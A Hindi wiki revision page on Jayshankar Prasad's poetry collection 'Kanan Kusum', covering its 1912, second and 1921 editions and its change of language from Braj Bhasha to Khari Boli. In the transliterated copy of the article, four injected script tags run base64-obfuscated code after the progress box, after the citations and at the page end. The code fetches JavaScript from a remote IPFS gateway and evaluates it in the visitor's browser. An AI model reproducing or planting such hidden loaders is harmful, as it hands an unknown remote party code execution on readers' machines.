Difference between revisions of "कानन कुसुम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
[[जयशंकर प्रसाद]] कृत 'कानन कुसुम' के वर्तमान संस्करण में केवल [[खड़ी बोली]] ही रचनाएँ मिलती हैं।
 
[[जयशंकर प्रसाद]] कृत 'कानन कुसुम' के वर्तमान संस्करण में केवल [[खड़ी बोली]] ही रचनाएँ मिलती हैं।
 
;प्रथम संस्करण
 
;प्रथम संस्करण
इसका प्रथम संस्करण सन 1912 ई. में हुआ था। इसमें सन 1909 से लेकर 1917 तक की स्फुट कविताएँ संकलित हैं। प्रथम संस्करण में चालीस कविताएँ विभिन्न शीर्षकों से स्वतंत्र रूप में संकलित हैं और '''पराग''' शीर्षक के अंतर्गत बीस रचनाएँ हैं। इसमें पृष्ठों की संख्या 66 है।  
+
इसका प्रथम संस्करण सन् 1912 ई. में हुआ था। इसमें सन् 1909 से लेकर 1917 तक की स्फुट कविताएँ संकलित हैं। प्रथम संस्करण में चालीस कविताएँ विभिन्न शीर्षकों से स्वतंत्र रूप में संकलित हैं और '''पराग''' शीर्षक के अंतर्गत बीस रचनाएँ हैं। इसमें पृष्ठों की संख्या 66 है।  
 
;दूसरा संस्करण
 
;दूसरा संस्करण
 
दूसरे संस्करण में इसे 112 पृष्ठों तक पहुँचा दिया गया है। दूसरे संस्करण के 66 पृष्ठ पर 'शम' शब्द लिखकर प्रसाद जी ने उसके बाद की रचनाओं को जोड़ दिया है।  
 
दूसरे संस्करण में इसे 112 पृष्ठों तक पहुँचा दिया गया है। दूसरे संस्करण के 66 पृष्ठ पर 'शम' शब्द लिखकर प्रसाद जी ने उसके बाद की रचनाओं को जोड़ दिया है।  
Line 7: Line 7:
 
'कानन कुसुम' का तृतीय संस्करण 1921 ई. में 'पुस्तक भंडार लहेरिया सराय' से प्रकाशित हुआ था। तब से यह उसी रूप में आज तक प्रकाशित हो रहा है।  
 
'कानन कुसुम' का तृतीय संस्करण 1921 ई. में 'पुस्तक भंडार लहेरिया सराय' से प्रकाशित हुआ था। तब से यह उसी रूप में आज तक प्रकाशित हो रहा है।  
 
==भाषा शैली==
 
==भाषा शैली==
प्रथम संस्करण में 'कानन कुसुम' में [[ब्रज भाषा]] और दूसरे संस्करण में परिनिष्ठित [[खड़ी बोली]] और ब्रज भाषा की रचनाएँ संकलित हैं। लेकिन 'कानन कुसुम' के तृतीय संस्करण में सिर्फ खड़ी बोली की रचनाएँ मिलती हैं। इसमें भी उस समय तक सभी खड़ी बोली में लिखी गयी कविताओं को नहीं रखा गया है। कुछ कविताएँ '''झरना''' और '''लहर''' में जोड़ दी गयी है। द्वितीय संस्करण की जिन कविताओं में ब्रजभाषा की पंक्तियाँ विद्यमान हैं उन्हें तृतीय संस्करण में हटा दिया गया। ब्रजभाषा की विकास यात्रा तय करने के पश्चात पुन: वे उस ओर नहीं मुड़े। ऐसा उनकी प्रारम्भिक रचनाओं को देखकर संकेत मिलता है। इन रचनाओं के संस्करणगत अध्ययनों से कवि के विकासशील व्यक्तित्व का आभास मिलता है।
+
प्रथम संस्करण में 'कानन कुसुम' में [[ब्रज भाषा]] और दूसरे संस्करण में परिनिष्ठित [[खड़ी बोली]] और ब्रज भाषा की रचनाएँ संकलित हैं। लेकिन 'कानन कुसुम' के तृतीय संस्करण में सिर्फ खड़ी बोली की रचनाएँ मिलती हैं। इसमें भी उस समय तक सभी खड़ी बोली में लिखी गयी कविताओं को नहीं रखा गया है। कुछ कविताएँ '''झरना''' और '''लहर''' में जोड़ दी गयी है। द्वितीय संस्करण की जिन कविताओं में ब्रजभाषा की पंक्तियाँ विद्यमान हैं उन्हें तृतीय संस्करण में हटा दिया गया। ब्रजभाषा की विकास यात्रा तय करने के पश्चात् पुन: वे उस ओर नहीं मुड़े। ऐसा उनकी प्रारम्भिक रचनाओं को देखकर संकेत मिलता है। इन रचनाओं के संस्करणगत अध्ययनों से कवि के विकासशील व्यक्तित्व का आभास मिलता है।
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक=|पूर्णता=|शोध=}}
 
 
 
 
 
 
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
{{cite book | last =अनूप| first =कुमार| title =प्रसाद की रचनाओं में संस्करणगत परिवर्तनों का अध्ययन| edition =| publisher =| location =| language =हिंदी| pages =| chapter =पर आधारित}}
 
{{cite book | last =अनूप| first =कुमार| title =प्रसाद की रचनाओं में संस्करणगत परिवर्तनों का अध्ययन| edition =| publisher =| location =| language =हिंदी| pages =| chapter =पर आधारित}}
 
 
{{cite book | last =धीरेंद्र| first =वर्मा| title =हिंदी साहित्य कोश| edition =| publisher =| location =| language =हिंदी| pages =81| chapter =भाग- 2 पर आधारित}}
 
{{cite book | last =धीरेंद्र| first =वर्मा| title =हिंदी साहित्य कोश| edition =| publisher =| location =| language =हिंदी| pages =81| chapter =भाग- 2 पर आधारित}}
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{जयशंकर प्रसाद}}
 
{{जयशंकर प्रसाद}}

Latest revision as of 07:52, 23 June 2017

jayashankar prasad krit 'kanan kusum' ke vartaman sanskaran mean keval kh di boli hi rachanaean milati haian.

pratham sanskaran

isaka pratham sanskaran sanh 1912 ee. mean hua tha. isamean sanh 1909 se lekar 1917 tak ki sphut kavitaean sankalit haian. pratham sanskaran mean chalis kavitaean vibhinn shirshakoan se svatantr roop mean sankalit haian aur parag shirshak ke aantargat bis rachanaean haian. isamean prishthoan ki sankhya 66 hai.

doosara sanskaran

doosare sanskaran mean ise 112 prishthoan tak pahuancha diya gaya hai. doosare sanskaran ke 66 prishth par 'sham' shabd likhakar prasad ji ne usake bad ki rachanaoan ko jo d diya hai.

tritiy sanskaran

'kanan kusum' ka tritiy sanskaran 1921 ee. mean 'pustak bhandar laheriya saray' se prakashit hua tha. tab se yah usi roop mean aj tak prakashit ho raha hai.

bhasha shaili

pratham sanskaran mean 'kanan kusum' mean braj bhasha aur doosare sanskaran mean parinishthit kh di boli aur braj bhasha ki rachanaean sankalit haian. lekin 'kanan kusum' ke tritiy sanskaran mean sirph kh di boli ki rachanaean milati haian. isamean bhi us samay tak sabhi kh di boli mean likhi gayi kavitaoan ko nahian rakha gaya hai. kuchh kavitaean jharana aur lahar mean jo d di gayi hai. dvitiy sanskaran ki jin kavitaoan mean brajabhasha ki panktiyaan vidyaman haian unhean tritiy sanskaran mean hata diya gaya. brajabhasha ki vikas yatra tay karane ke pashchath pun: ve us or nahian mu de. aisa unaki prarambhik rachanaoan ko dekhakar sanket milata hai. in rachanaoan ke sanskaranagat adhyayanoan se kavi ke vikasashil vyaktitv ka abhas milata hai.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


anoop, kumar “par adharit”, prasad ki rachanaoan mean sanskaranagat parivartanoan ka adhyayan (hiandi).<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

dhireandr, varma “bhag- 2 par adharit”, hiandi sahity kosh (hiandi), 81.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>